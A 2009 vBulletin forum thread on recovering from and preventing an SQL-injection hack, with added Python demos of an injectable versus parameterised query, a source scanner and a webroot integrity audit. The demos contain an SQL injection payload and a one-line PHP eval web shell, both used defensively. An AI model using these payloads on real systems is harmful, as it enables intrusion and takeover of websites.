Yes, you could have a modification installed that is open to SQL injection attack. This is the most likely method.
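What "a modification open to SQL injection" means in practice, and one way to answer the later question of how to tell whether an installed mod has that problem. This is an added example in Python with sqlite3, not vBulletin's database layer: the vulnerable function has the shape of a mod that pastes `$_GET`/`$_POST` straight into a query string, the safe one binds the value as a parameter (in vBulletin 3 the equivalent is cleaning the input with `$vbulletin->input->clean_gpc()` and escaping it with `$db->escape_string()` before it reaches the query). The table, the rows, the payload and the PHP lines scanned at the end are all constructed.

```python
"""What "a modification open to SQL injection" looks like, in miniature.
Added example in Python/sqlite3, not vBulletin's own database layer: the
vulnerable function has the shape of a mod that pastes $_GET/$_POST into a
query string; the safe one binds the value. A small heuristic scan for that
shape in PHP source is included; the PHP lines it scans are constructed."""
import re
import sqlite3


def make_db():
    """Constructed three-user table in the shape of vBulletin's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid INTEGER, username TEXT, usergroupid INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)",
                     [(1, "admin", 6), (2, "bob", 2), (3, "carol", 2)])
    return conn


def fetch_member_vulnerable(conn, username):
    # Same shape as  $db->query_read("... WHERE username = '$_GET[u]' AND usergroupid = 2")
    sql = f"SELECT userid, username FROM user WHERE username = '{username}' AND usergroupid = 2"
    return conn.execute(sql).fetchall()


def fetch_member_safe(conn, username):
    # The value travels as a bound parameter; it can never become SQL syntax.
    sql = "SELECT userid, username FROM user WHERE username = ? AND usergroupid = 2"
    return conn.execute(sql, (username,)).fetchall()


# Closes the open quote, makes the WHERE always true, comments out the rest.
PAYLOAD = "x' OR '1'='1' --"

# --- heuristic source check -------------------------------------------------
# A query call and a raw superglobal on the same line is the pattern to go read.
QUERY_CALL = re.compile(r"\bquery(?:_read|_write|_first)?\s*\(")
RAW_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[")


def suspicious_query_lines(php_source: str) -> list[int]:
    """1-based line numbers where a query call and an unfiltered superglobal meet."""
    return [i for i, line in enumerate(php_source.splitlines(), 1)
            if QUERY_CALL.search(line) and RAW_INPUT.search(line)]


SAMPLE_MOD = """\
<?php
// constructed mod code; the first query has the injectable shape
$rows = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE username = '$_GET[u]'");
$vbulletin->input->clean_gpc('r', 'u', TYPE_NOHTML);
$safe = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE username = '" . $db->escape_string($vbulletin->GPC['u']) . "'");
"""

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, payload:", fetch_member_vulnerable(conn, PAYLOAD))
    print("safe, payload      :", fetch_member_safe(conn, PAYLOAD))
    print("lines to review    :", suspicious_query_lines(SAMPLE_MOD))
```

The heuristic scan is a starting point, not a verdict: it misses input that is copied into a variable first and flags lines that are in fact escaped, so every hit has to be read. A mod that is "only reachable from the admincp" still counts; the admin session is exactly the one an attacker wants to ride.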

Angel-Wings 09-26-2009 12:58 PM

Quote:

Originally Posted by knucklenitz (Post 1890282)
Just to make sure I understand, moving the config.php to another directory out of the public html will not affect vb operation?

This won't increase security at all, for the simple fact that your VB still needs to be able to read that file. So you may move it around on the filesystem, but you still have to find a way for VB to read this file, either by symlinking or something else.
If that is done, every "hacker" will be able to read that file as well.

Better spend your time keeping your VB & Plugins up-to-date and use things like mod_security / suhosin and the typical setups like chroot / jail. That's more time consuming, but it isn't "security by obscurity" like moving some files around just to have a work-around so that VB can read them.

And make sure your VB files aren't writeable by PHP itself; if you store uploads in the filesystem, move that directory outside the webroot, and additionally some directories like images / signaturepics don't need PHP because only images are stored there.

Something simple like:

Code:

# A regex directory match needs the ~ form (or <DirectoryMatch>); the list is
# shortened with ... as in the original. php_admin_flag, unlike php_flag, cannot
# be switched back on by a .htaccess an attacker drops into the directory.
<Directory ~ "^/where_ever_your_vb_is_stored/(clientscript|cpstyles|customavatars...)">
    php_admin_flag engine off
</Directory>

# <Files> matches the file name only, so scope it with the directory it lives in.
# (Apache 2.2 syntax; on 2.4 the three access lines become "Require ip 127.0.0.1".)
<Directory "/where_ever_your_vb_is_stored/includes">
    <Files "config.php">
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1
    </Files>
</Directory>

Then move the "uploads" directory outside the webroot so that it can't be accessed directly.
Finally - mod_security & suhosin should be used. First start them both in logging mode to collect a whitelist, which highly depends on how your forum is used, and once that whitelist is completed and false positives are sorted out, set both to blocking mode.

And - as a last addition - you can set up an IDS that creates checksums of your VB files and alerts you if there are any changes.

Yes - I can do this ;) It won't even cost much ;)
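Two of the checks recommended in this thread, TECK's point about 0777 directories inside the webroot and Angel-Wings' checksum-based integrity alert, share the same walk over the tree, so here they are in one added script. It is not a tool from the thread or from vBulletin; `demo()` builds a constructed vBulletin-like layout in a temporary directory, takes a baseline, then simulates the kind of change seen at the top of the thread (a PHP prefix prepended to `index.php`, a new `.php` file dropped into a world-writable image directory) and reports what the audit sees.

```python
"""Webroot audit for two points made in this thread: the 0777 directories TECK
warns about and the checksum-based integrity check Angel-Wings suggests.
Added example, not a tool from the thread or from vBulletin; demo() builds a
constructed vB-like tree in a temporary directory."""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path

WATCHED_SUFFIXES = (".php", ".html", ".htm", ".js")


def world_writable_dirs(root):
    """Relative paths of directories any local user (another site's PHP, a
    compromised FTP account) can write into."""
    root = Path(root)
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            p = Path(dirpath) / d
            if os.lstat(p).st_mode & stat.S_IWOTH:
                hits.append(str(p.relative_to(root)))
    return sorted(hits)


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """relative path -> sha256 for every script, template and .htaccess under root."""
    root = Path(root)
    return {str(p.relative_to(root)): _sha256(p) for p in root.rglob("*")
            if p.is_file() and (p.suffix in WATCHED_SUFFIXES or p.name == ".htaccess")}


def compare_baseline(root, baseline):
    """Files that appeared, vanished or changed since the baseline was taken."""
    current = build_baseline(root)
    both = current.keys() & baseline.keys()
    return {"added": sorted(current.keys() - baseline.keys()),
            "removed": sorted(baseline.keys() - current.keys()),
            "modified": sorted(k for k in both if current[k] != baseline[k])}


def demo():
    """Constructed tree with one 0777 dir, then an 'infection' like the one in this thread."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for d in ("includes", "arcade", "arcade/cat_imgs"):
            (root / d).mkdir()
            os.chmod(root / d, 0o755)
        (root / "index.php").write_text("<?php echo 'ok'; ?>\n")
        (root / "includes/config.php").write_text("<?php $config = array(); ?>\n")
        (root / "arcade/cat_imgs/index.html").write_text("<html></html>\n")
        os.chmod(root / "arcade/cat_imgs", 0o777)      # the permission TECK objects to

        perms = world_writable_dirs(root)
        saved = json.dumps(build_baseline(root))         # keep this copy off-box or read-only

        index = root / "index.php"                       # attacker prepends a PHP prefix ...
        index.write_text("<?php /* injected */ ?>" + index.read_text())
        (root / "arcade/cat_imgs/c.php").write_text(     # ... and drops a shell
            "<?php eval($_POST['c']); ?>\n")
        return perms, compare_baseline(root, json.loads(saved))


if __name__ == "__main__":
    perms, diff = demo()
    print("world-writable dirs:", perms)
    print("integrity diff     :", diff)
```

Take the baseline from a known-good install (right after an upgrade), store it somewhere the web server's user cannot write, and diff on a timer; the first post in this thread was noticed because the injection broke PHP syntax, and a variant that does not would otherwise go unnoticed until a visitor complains about the script it loads.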

knucklenitz 09-26-2009 03:14 PM

I hate to hjack this thread but Angel-Wings has got my attention.

I found that the person that attacked with SQL injection came from overseas, I am in the US. Since ALL of my traffic is actually on the west coast, I used htaccess to block all but US traffic. Appears to be working so far according to my logs.

On the SQL injection note, I restored my backup database so the hacked database is gone. I have contacted the programmer of the only two mods I have installed and he indicated they work on the admincp level so injection isn't possible. Since I'm a newbie in this area, I can't confirm. Is there any way to track database activity so I can find out how they got in?

It appears the last two actions (many other http/file.php attempts before that) were the hacker going to sendmessage.php and then 45 minutes later, them going to the index probably to check that their hack worked. I have since disabled the sendmessage.php in the contact vb options.

Thanks for any input.

snakes1100 09-26-2009 03:56 PM

If you would have done as I posted in your own thread, you wouldn't have needed to restore a backup.

1. You should have upgraded vb, hacks/addons, server backend and anything else outdated.
2. Symlinking your config.php isn't going to stop the hacker either.
3. Blocking foreign based IPs isn't going to stop him either.

Seeing as you still present the injection hole for him to use, he will be back to visit you again.

Angel-Wings 09-26-2009 04:23 PM

Quote:

Originally Posted by knucklenitz (Post 1890854)
I found that the person that attacked with SQL injection came from overseas, I am in the US. Since ALL of my traffic is actually on the west coast, I used htaccess to block all but US traffic. Appears to be working so far according to my logs.

And the logs just say the attacker isn't coming from US West coast ? Well, in a world of bot nets and open proxies it's maybe just a matter of time until the attacker found an IP that isn't blocked.
Maybe better spend your time fixing the holes - if I don't lock the door and just paste a huge poster over it, the door itself isn't more "secure", and this "door" is the problem, not how to hide it from someone.

Quote:

Originally Posted by knucklenitz (Post 1890854)
On the SQL injection note, I restored my backup database so the hacked database is gone. I have contacted the programmed of the only two mods I have installed and he indicated they work on the admincp level so injection isn't possible. Since I'm a newbie in this area, I can't confirm. Is there any way to track database activity so I can find out how they got in?

You can enable the Query log in your Database but this might be a performance issue. Also protecting the Admin & Mod Panel with an Auth won't hurt - just ensure the login user and password aren't written somewhere at your board.

Quote:

Originally Posted by knucklenitz (Post 1890854)
It appears the last two actions (many other http/file.php attempts before that) were the hacker going to sendmessage.php and then 45 minutes later, them going to the index probably to check that their hack worked. I have since disabled the sendmessage.php in the contact vb options.

Can also be the usual "background noise" like automatic IP scans for holes in the all-time-favorites like Joomla, phpMyAdmin, Horde and some older VB holes. Dunno how the attacking people(s) read their attack logs, maybe they just filtered for 200 replies and so wanted to see if they did any damage.
Right now, try to find out how it happened and fix the hole. Then things like IP Range blocking can be done anyways - first get the system clean and up-to-date - then additional enhancements can be done. :)

knucklenitz 09-26-2009 05:12 PM

Quote:

Originally Posted by snakes1100 (Post 1890886)
If you would have done as I posted in your own thread, you wouldn't have needed to restore a backup.

1. You should have upgraded vb, hacks/addons, server backend and anything else outdated.
2. Symlinking your config.php isn't going to stop the hacker either.
3. Blocking foreign based IPs isn't going to stop him either.

Seeing as you still present the injection hole for him to use, he will be back to visit you again.

I spoke with the programmer of the two mods. He indicated these mods are not accessible from anywhere but the admincp. I am not a programmer so I can't confirm. The guy has a good reputation but who can you really trust.

I am at 3.8.3 [EDIT: Actually 3.8.2]. I am not sure that 3.8.4 has any security fixes in it. I'll double check. I believe my host has the server up to date. Again, I'll double check.

I can't see how just updating as you suggested would have removed the hack they injected without me restoring the backup (note that this was a database restore only, not entire system). No matter what I did, it showed a disturbing picture and hackers text. It seems that would be in the database no matter what updates were performed.

Quote:

Originally Posted by Angel-Wings (Post 1890907)
And the logs just say the attacker isn't coming from US West coast ? Well, in a world of bot nets and open proxies it's maybe just a matter of time until the attacker found an IP that isn't blocked.
Maybe better spend your time fixing the holes - if I don't lock the door and just paste a huge poster over it, the door itself isn't more "secure", and this "door" is the problem, not how to hide it from someone.

I figured this wasn't a fix but a band-aid until I got the hole fixed. I also have some code in the htaccess to deny proxy and other items. Found it online and learning as I go, hope it works.
Code:

RewriteEngine on
# Refuse any request carrying a header that some proxies add. %{HTTP:...} takes
# the real header name (hyphens); the underscore spellings match nothing, and a
# leading HTTP_ is not part of the name. This only catches proxies that announce
# themselves, so it is a filter for noise, not a control.
RewriteCond %{HTTP:Via}                 !^$ [OR]
RewriteCond %{HTTP:Forwarded}           !^$ [OR]
RewriteCond %{HTTP:Useragent-Via}       !^$ [OR]
RewriteCond %{HTTP:X-Forwarded-For}     !^$ [OR]
RewriteCond %{HTTP:Proxy-Connection}    !^$ [OR]
RewriteCond %{HTTP:Xproxy-Connection}   !^$ [OR]
RewriteCond %{HTTP:PC-Remote-Addr}      !^$ [OR]
RewriteCond %{HTTP:Client-IP}           !^$
RewriteRule ^(.*)$ - [F]

Quote:

Originally Posted by Angel-Wings (Post 1890907)
You can enable the Query log in your Database but this might be a performance issue. Also protecting the Admin & Mod Panel with an Auth won't hurt - just ensure the login user and password aren't written somewhere at your board.

I have htaccess for admin and mod c p that requires authentication.

Quote:

Originally Posted by Angel-Wings (Post 1890907)
Can also be the usual "background noise" like automatic IP scans for holes in the all-time-favorites like Joomla, phpMyAdmin, Horde and some older VB holes. Dunno how the attacking people(s) read their attack logs, maybe they just filtered for 200 replies and so wanted to see if they did any damage.
Right now, try to find out how it happened and fix the hole. Then things like IP Range blocking can be done anyways - first get the system clean and up-to-date - then additional enhancements can be done. :)

I guess I am taking the right steps, just out of order. I'm still at a loss for figuring out how they 'injected' in the first place. Please forgive my ignorance. From what I've read, VBulletin is pretty secure against injection as long as there aren't any mods. Is this a fact? I am using the VB default style so it shouldn't be an issue there. How would I be able to tell if the two mods I have are not secure?

Thanks again for input.

CarlitoBrigante 09-26-2009 05:38 PM

We had about a dozen cases in the past week from our clients of websites with vBulletin that were hacked. Anyhow, it turned out all of them had been hacked through a Wordpress installed on the server. Some of our clients had old WP installations they had forgotten about, others did not upgrade as they were recommended to, and script kids entered through WP, took the passwd file, and decrypted passwords, gaining FTP access.

There are many ways to prevent this; keep your system always updated; keep your applications always updated; and then do everything you can to secure your system. The best way to prevent attacks that write files to a directory to execute them is to have a system like SELinux in place, or GRSecurity. There are wonderful linux distributions that, for a few bucks per year, provide a secured kernel with many layers of protection applied - from modsecurity to granular permissions, and everything in between.

snakes1100 09-26-2009 05:42 PM

The reason I stated you didn't need to restore from a backup is that you could have just removed the code they injected, which was likely base64 code in a template, most likely spacer_open.

As stated, you haven't plugged the hole and you're not going to stop him from revisiting your forum by doing an IP block or symlinking your config file.

Unless you know for sure that everything on your site/server is secure, you're at risk.

@Carlito, excellent point on the WP, thats why i told him everything needs to be upgraded.

knucklenitz 09-26-2009 08:53 PM

Quote:

Originally Posted by snakes1100 (Post 1890949)
The reason I stated you didn't need to restore from a backup is that you could have just removed the code they injected, which was likely base64 code in a template, most likely spacer_open.

As stated, you haven't plugged the hole and you're not going to stop him from revisiting your forum by doing an IP block or symlinking your config file.

Unless you know for sure that everything on your site/server is secure, you're at risk.

@Carlito, excellent point on the WP, thats why i told him everything needs to be upgraded.

I see. I'm learning as I go here.

I just upgraded to 3.8.4. I'm not familiar with the coding of databases. Is it something I can check now to see if there is a hole and the 'base64 code into a template, most likely spacer_open' can be used again? How does one check for these vulnerabilities?

No Wordpress on my side, but I did talk to my host and this being a shared server, I guess there is always a possibility of someone hacking another database or application on the other virtuals and affecting my system?

Angel-Wings 09-26-2009 09:41 PM

Quote:

Originally Posted by knucklenitz (Post 1891041)
No Wordpress on my side but I did talk to my host and this being a shared server, I guess there is always a possiblity of someone hacking another database or application on the other virtuals and affecting my system?

Well - if that's the case then it's the hoster's fault by not separating client websites enough - it's possible for one "hacked" website to access all other sites.
Really depends on how their machines are configured so blaming them might be too early - still yes, it's possible.
Hope you still have the logs saved - maybe they'll like to see them for analysis.

Oh - and your htaccess just blocks proxies that shout out to the world they are proxies. No "real" hacker would use such anyways.
Like said - really recommend mod_sec to block things you don't want - beginning with direct IP access and ending with filtering bad useragents or injection attacks.

